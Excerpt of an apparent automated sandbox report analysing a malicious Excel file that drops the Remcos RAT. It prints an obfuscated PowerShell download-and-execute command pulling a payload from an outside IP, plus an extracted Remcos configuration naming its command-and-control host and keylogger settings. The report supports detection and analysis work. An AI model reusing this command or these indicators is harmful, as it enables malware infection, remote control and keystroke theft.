ProcessName: wscript.exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline
                    Sigma detected: Modification of IE Registry Settings
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3480, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", CommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgI
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\yd20fzhg.x0b.ps1

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", ProcessId: 3976, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 1908, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:23:40.699679+020020241971A Network Trojan was detected192.3.220.4080192.168.2.2249162TCP
                    2024-10-08T15:23:43.864669+020020241971A Network Trojan was detected192.3.220.4080192.168.2.2249164TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:23:40.699677+020020244491Attempted User Privilege Gain192.168.2.2249162192.3.220.4080TCP
                    2024-10-08T15:23:43.864625+020020244491Attempted User Privilege Gain192.168.2.2249164192.3.220.4080TCP
                    2024-10-08T15:24:01.627421+020020244491Attempted User Privilege Gain192.168.2.2249172192.3.220.4080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:24:01.381632+020020204231Exploit Kit Activity Detected192.3.220.4080192.168.2.2249171TCP
                    2024-10-08T15:24:21.488970+020020204231Exploit Kit Activity Detected192.3.220.4080192.168.2.2249177TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:24:01.381632+020020204251Exploit Kit Activity Detected192.3.220.4080192.168.2.2249171TCP
                    2024-10-08T15:24:21.488970+020020204251Exploit Kit Activity Detected192.3.220.4080192.168.2.2249177TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:24:02.926947+020020365941Malware Command and Control Activity Detected192.168.2.2249173135.148.195.2486875TCP
                    2024-10-08T15:24:03.976682+020020365941Malware Command and Control Activity Detected192.168.2.2249174135.148.195.2486875TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:24:00.186433+020020490381A Network Trojan was detected207.241.227.242443192.168.2.2249166TCP
                    2024-10-08T15:24:20.543211+020020490381A Network Trojan was detected207.241.227.242443192.168.2.2249176TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:24:04.397505+020028033043Unknown Traffic192.168.2.2249175178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Multi AV Scanner detection for submitted file
                    Source: QPS-36477.xlsReversingLabs: Detection: 18%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Machine Learning detection for sample
                    Source: QPS-36477.xlsJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404423 FreeLibrary,CryptUnprotectData,21_2_00404423
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,30_2_004338C8
                    Source: powershell.exe, 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4998d6fa-d

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00407538 _wcslen,CoGetObject,30_2_00407538
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49176 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdb source: powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdbhP source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
